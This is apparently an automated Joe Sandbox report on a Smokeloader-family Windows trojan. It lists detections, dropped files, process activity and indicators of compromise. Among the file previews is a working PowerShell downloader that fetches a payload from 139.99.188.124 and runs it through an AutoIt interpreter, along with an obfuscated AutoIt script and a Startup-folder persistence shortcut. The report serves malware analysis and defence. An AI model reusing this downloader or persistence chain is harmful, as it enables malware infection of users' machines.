behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577214 Sample: EO3RT0fEfb.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 50 nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs 2->50 54 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 Sigma detected: Drops script at startup location 2->58 60 9 other signatures 2->60 10 EO3RT0fEfb.exe 1 2->10         started        14 wscript.exe 1 1 2->14         started        signatures3 process4 file5 48 C:\Users\Public\PublicProfile.ps1, ASCII 10->48 dropped 68 Suspicious powershell command line found 10->68 70 Binary is likely a compiled AutoIt script file 10->70 72 Bypasses PowerShell execution policy 10->72 16 powershell.exe 17 10->16         started        19 powershell.exe 14 16 10->19         started        74 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->74 23 SwiftWrite.pif 14->23         started        signatures6 process7 dnsIp8 38 C:\Users\Public\Secure.au3, Unicode 16->38 dropped 25 Guard.exe 4 16->25         started        29 conhost.exe 16->29         started        52 139.99.188.124, 49730, 49731, 80 OVHFR Canada 19->52 40 C:\Users\Publicbehaviorgraphuard.exe, PE32 19->40 dropped 62 Drops PE files to the user root directory 19->62 64 Powershell drops PE file 19->64 31 conhost.exe 19->31         started        file9 signatures10 process11 file12 44 C:\Users\user\AppData\...\SwiftWrite.pif, PE32 25->44 dropped 46 C:\Users\user\AppData\Local\...\SwiftWrite.js, ASCII 25->46 dropped 66 Drops PE files with a suspicious file extension 25->66 33 cmd.exe 2 25->33         started        signatures13 process14 file15 42 C:\Users\user\AppData\...\SwiftWrite.url, MS 33->42 dropped 36 conhost.exe 33->36         started        process16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
EO3RT0fEfb.exe55%ReversingLabsWin64.Trojan.Smokeloader
EO3RT0fEfb.exe46%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Users\Public\Guard.exe8%ReversingLabs
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif8%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://139.99.188.1240%Avira URL Cloudsafe
http://139.99.HB0%Avira URL Cloudsafe
http://139.99.188.124/aiSMo0%Avira URL Cloudsafe
http://139.99.188.124/ucZfzm.txt0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
unknown
unknownfalse
    high
    NameMaliciousAntivirus DetectionReputation
    http://139.99.188.124/ucZfzm.txttrue
    • Avira URL Cloud: safe
    unknown
    http://139.99.188.124/aiSMotrue
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://www.autoitscript.com/autoit3/JGuard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2928023536.0000000000BC9000.00000002.00000001.01000000.00000007.sdmp, SwiftWrite.pif, 0000000C.00000000.1918927211.0000000000319000.00000002.00000001.01000000.00000009.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drfalse
      high
      http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1792733359.000001E2B4DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1809768933.000001E2C3525000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000003.00000002.1792733359.000001E2B4B06000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://crl.mpowershell.exe, 00000003.00000002.1821309242.000001E2CBC7F000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1792733359.000001E2B4D28000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://139.99.188.124powershell.exe, 00000003.00000002.1792733359.000001E2B4810000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1792733359.000001E2B36D8000.00000004.00000800.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1792733359.000001E2B4D28000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://go.micropowershell.exe, 00000003.00000002.1792733359.000001E2B45F4000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/powershell.exe, 00000003.00000002.1809768933.000001E2C3525000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1792733359.000001E2B4DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1809768933.000001E2C3525000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://contoso.com/Licensepowershell.exe, 00000003.00000002.1809768933.000001E2C3525000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Iconpowershell.exe, 00000003.00000002.1809768933.000001E2C3525000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://oneget.orgXpowershell.exe, 00000003.00000002.1792733359.000001E2B4B06000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://139.99.HBpowershell.exe, 00000003.00000002.1792733359.000001E2B4AD8000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://aka.ms/pscore68powershell.exe, 00000003.00000002.1792733359.000001E2B34B1000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://www.autoitscript.com/autoit3/Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drfalse
                                high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1792733359.000001E2B34B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1792733359.000001E2B4D28000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://oneget.orgpowershell.exe, 00000003.00000002.1792733359.000001E2B4B06000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      139.99.188.124
                                      unknownCanada
                                      16276OVHFRtrue
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1577214
                                      Start date and time:2024-12-18 09:31:38 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 8m 15s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:14
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:EO3RT0fEfb.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:c6a10001e9cd00207400da197bc724aed97fc6dde44c7b4b6ab7bf8c0916a429.exe
                                      Detection:MAL
                                      Classification:mal100.expl.evad.winEXE@15/12@2/1
                                      EGA Information:
                                      • Successful, ratio: 75%
                                      HCA Information:
                                      • Successful, ratio: 99%
                                      • Number of executed functions: 47
                                      • Number of non-executed functions: 255
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 173.222.162.32, 13.107.246.63, 172.202.163.200
                                      • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target powershell.exe, PID 7760 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      TimeTypeDescription
                                      03:32:31API Interceptor79x Sleep call for process: powershell.exe modified
                                      03:33:19API Interceptor2946x Sleep call for process: Guard.exe modified
                                      03:33:34API Interceptor1949x Sleep call for process: SwiftWrite.pif modified
                                      08:32:44AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      139.99.188.124S6x3K8vzCA.exeGet hashmaliciousUnknownBrowse
                                      • 139.99.188.124/wPBPjuY.txt
                                      PPbimZI4LV.exeGet hashmaliciousUnknownBrowse
                                      • 139.99.188.124/BlQMSgJx.txt
                                      l5VhEpwzJy.exeGet hashmaliciousUnknownBrowse
                                      • 139.99.188.124/jiJNz.txt
                                      duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                      • 139.99.188.124/QWCheljD.txt
                                      pt8GJiNZDT.exeGet hashmaliciousUnknownBrowse
                                      • 139.99.188.124/QWCheljD.txt
                                      FwR7as4xUq.exeGet hashmaliciousUnknownBrowse
                                      • 139.99.188.124/EPDjSfs.txt
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      OVHFRToYwLfhi9B.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                      • 139.99.188.124
                                      KE2yNJdV55.exeGet hashmaliciousPureCrypterBrowse
                                      • 139.99.188.124
                                      JnEZtj3vtN.exeGet hashmaliciousPureCrypterBrowse
                                      • 139.99.188.124
                                      uzI7DAON53.exeGet hashmaliciousPureCrypterBrowse
                                      • 139.99.188.124
                                      JXEsthReim.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                      • 139.99.188.124
                                      4a5MWYOGVy.exeGet hashmaliciousPureCrypterBrowse
                                      • 139.99.188.124
                                      YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                      • 139.99.188.124
                                      S6x3K8vzCA.exeGet hashmaliciousUnknownBrowse
                                      • 139.99.188.124
                                      x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                      • 139.99.188.124
                                      ToYwLfhi9B.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                      • 139.99.188.124
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\Public\Guard.exeS6x3K8vzCA.exeGet hashmaliciousUnknownBrowse
                                        PPbimZI4LV.exeGet hashmaliciousUnknownBrowse
                                          l5VhEpwzJy.exeGet hashmaliciousUnknownBrowse
                                            duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                              pt8GJiNZDT.exeGet hashmaliciousUnknownBrowse
                                                c2.htaGet hashmaliciousXWormBrowse
                                                  c2.htaGet hashmaliciousXWormBrowse
                                                    c2.htaGet hashmaliciousXWormBrowse
                                                      c2.htaGet hashmaliciousXWormBrowse
                                                        FwR7as4xUq.exeGet hashmaliciousUnknownBrowse
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):893608
                                                          Entropy (8bit):6.62028134425878
                                                          Encrypted:false
                                                          SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                          MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                          SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                          SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                          SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Joe Sandbox View:
                                                          • Filename: S6x3K8vzCA.exe, Detection: malicious, Browse
                                                          • Filename: PPbimZI4LV.exe, Detection: malicious, Browse
                                                          • Filename: l5VhEpwzJy.exe, Detection: malicious, Browse
                                                          • Filename: duyba.lnk.download.lnk, Detection: malicious, Browse
                                                          • Filename: pt8GJiNZDT.exe, Detection: malicious, Browse
                                                          • Filename: c2.hta, Detection: malicious, Browse
                                                          • Filename: c2.hta, Detection: malicious, Browse
                                                          • Filename: c2.hta, Detection: malicious, Browse
                                                          • Filename: c2.hta, Detection: malicious, Browse
                                                          • Filename: FwR7as4xUq.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\EO3RT0fEfb.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):484
                                                          Entropy (8bit):5.26353969417032
                                                          Encrypted:false
                                                          SSDEEP:12:f73/owLiSFEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:f73/ESCknZ9LzjYnRSb8Cba
                                                          MD5:8070A3B81AF99A8471E266DD49ED4B79
                                                          SHA1:AE12EFBCBCBBE01B21E422EF999678DA47511B91
                                                          SHA-256:6B32D23B6D0A636B061994CB9863C4890A0505BEBFFA828D0BC48D7A2410945F
                                                          SHA-512:81CDE6C9D8B044A22762D18ECE558126D6658E9AA1F5ED580A938DF5F7875158DC2A2594325EB98AE212486881C255FDA3A90BE587CB0DB84D8CED4B304A7F5E
                                                          Malicious:true
                                                          Preview:[string]$fU5L = "http://139.99.188.124/ucZfzm.txt"..[string]$oF6L = "C:\Users\Public\Secure.au3"..[string]$exePath = "C:\Users\Public\Guard.exe"....# Download the content from the URL..$wResp = New-Object System.Net.WebClient..$fCont = $wResp.DownloadString($fU5L)....# Save the downloaded content to the output file..Set-Content -Path $oF6L -Value $fCont -Encoding UTF8....# Run the executable with the output file as an argument..Start-Process -FilePath $exePath -ArgumentList $oF6L
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                          Category:dropped
                                                          Size (bytes):1247847
                                                          Entropy (8bit):5.140898523868387
                                                          Encrypted:false
                                                          SSDEEP:12288:28V+jcfSzZ7KZTGZ37mDHOQ2FDx3Ezfe3d:qcU7WHOQ2dxDN
                                                          MD5:CFA6D039D484DE0F6DCF14F2B6C386F1
                                                          SHA1:1F70DD6C2234DB964A3202221D3661858E81FF95
                                                          SHA-256:33649162845B1808B3C6F526D3793966CA000C141F8D5EC2DA46ED9AE6BB7EEA
                                                          SHA-512:7297EE09E534C2CFFE6F58FC66B753CB8E66FDDB03114E143417E8B88F12E39D0D86914F6C1E41CFAFF814C1B7C7FA52E4BA5C523713DC4DE5BC31384DE15665
                                                          Malicious:true
                                                          Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):0.34726597513537405
                                                          Encrypted:false
                                                          SSDEEP:3:Nlll:Nll
                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                          Malicious:false
                                                          Preview:@...e...........................................................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Users\Public\Guard.exe
                                                          File Type:ASCII text, with very long lines (1266)
                                                          Category:dropped
                                                          Size (bytes):1247844
                                                          Entropy (8bit):5.14085872849876
                                                          Encrypted:false
                                                          SSDEEP:12288:D8V+jcfSzZ7KZTGZ37mDHOQ2FDx3Ezfe3d:DcU7WHOQ2dxDN
                                                          MD5:AF26E78A7B1688F22E301DE5FF48F75E
                                                          SHA1:DA88E5E83E9FBB85B938C90D49DA00788EF470F6
                                                          SHA-256:3989B561BA9A062198ED96BA5571375C47AADC81A1D783756A74A842A4F72393
                                                          SHA-512:0AB27B367B5A9A1E4B259AC9644B1228020373E8BED53DBAC3F97FB27FAE8507BDD8A2C3496225DE74860031E3BD953D13FCD375403124182B3DD36A01C94F99
                                                          Malicious:false
                                                          Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]
                                                          Process:C:\Users\Public\Guard.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):184
                                                          Entropy (8bit):4.736154105743425
                                                          Encrypted:false
                                                          SSDEEP:3:RiMIpGXfeNH5E5wWAX+Ro6p4EkD5yKXW/Zi+0/RaMl85uWAX+Ro6p4EkD5yKXW/f:RiJbNHCwWDKaJkDrXW/Zz0tl8wWDKaJX
                                                          MD5:612D28A7A2758BAAF54DB34272446F87
                                                          SHA1:D4671632FC2141EF2AB2455F8923BC5197B2FD68
                                                          SHA-256:94A83DD87CE7268703585A40C52491DDC7D332380B82832951DED047AAE6D73A
                                                          SHA-512:B4B64908C674F92F5D4B1E761E123957E8D5CD6C3F433D2D5C6ADD19101FD0610EE968222D4CED31E8F21F7F022D880E7E723E4171BC7DB18C37A2000A58565B
                                                          Malicious:true
                                                          Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")
                                                          Process:C:\Users\Public\Guard.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):893608
                                                          Entropy (8bit):6.62028134425878
                                                          Encrypted:false
                                                          SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                          MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                          SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                          SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                          SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):98
                                                          Entropy (8bit):4.915531212533357
                                                          Encrypted:false
                                                          SSDEEP:3:HRAbABGQaFyw3pYot+kiE2J5yKXW/Zi+URAAy:HRYF5yjowkn23yKXW/Zzyy
                                                          MD5:56D029782506F3E1F7EC40780D1DA27F
                                                          SHA1:C7E0690DE9B31C951AC212A7E940E460267F2BA1
                                                          SHA-256:5F412A72A3459ACA6A245DE1A280AB53CA5E6B306FECA32E0DF4B0B9B7863223
                                                          SHA-512:1C5F108FB4325E4B47E9EE15F5D828569EE90676D5170D6D3B92BD13BD39CCAA68657CBB97761007154C73D2FFCFA8A3582879CB2097A899B22C1C83848A9D92
                                                          Malicious:true
                                                          Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..
                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Entropy (8bit):6.306463308977624
                                                          TrID:
                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                          • DOS Executable Generic (2002/1) 0.92%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:EO3RT0fEfb.exe
                                                          File size:1'083'904 bytes
                                                          MD5:dc83439d47b35f0556beedbc95c57fc5
                                                          SHA1:a3674a56c0e6d0ce15936177efc40c0fb0ffe660
                                                          SHA256:c6a10001e9cd00207400da197bc724aed97fc6dde44c7b4b6ab7bf8c0916a429
                                                          SHA512:76f932803506303b54a1be7b2764c92909878901f3b002805c2ce263e35a1673c4033e63146aaf88a4ab7eaa7ed776d777a563380d62f833d5911610f8401f12
                                                          SSDEEP:24576:MrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9Tval1v:M2EYTb8atv1orq+pEiSDTj1VyvBaT
                                                          TLSH:83357C4973A4419DFEABE1B6CA23C607D6B17C490276861F01A47B767F337712A2E321
                                                          File Content Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG.....>PG......PG......PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(..#PG."(..*PG."(...PG.+PF..RG..9I.{PG..9D.*PG..9..*PG
                                                          Icon Hash:0fd88dc89ea7861b
                                                          Entrypoint:0x14002549c
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x140000000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6752C2B4 [Fri Dec 6 09:24:04 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:2
                                                          File Version Major:5
                                                          File Version Minor:2
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:2
                                                          Import Hash:fadc5a257419d2541a6b13dfb5e311e2
                                                          Instruction
                                                          dec eax
                                                          sub esp, 28h
                                                          call 00007F48CD231430h
                                                          dec eax
                                                          add esp, 28h
                                                          jmp 00007F48CD230D3Fh
                                                          int3
                                                          int3
                                                          inc eax
                                                          push ebx
                                                          dec eax
                                                          sub esp, 20h
                                                          dec eax
                                                          mov ebx, ecx
                                                          dec eax
                                                          mov eax, edx
                                                          dec eax
                                                          lea ecx, dword ptr [0009466Dh]
                                                          dec eax
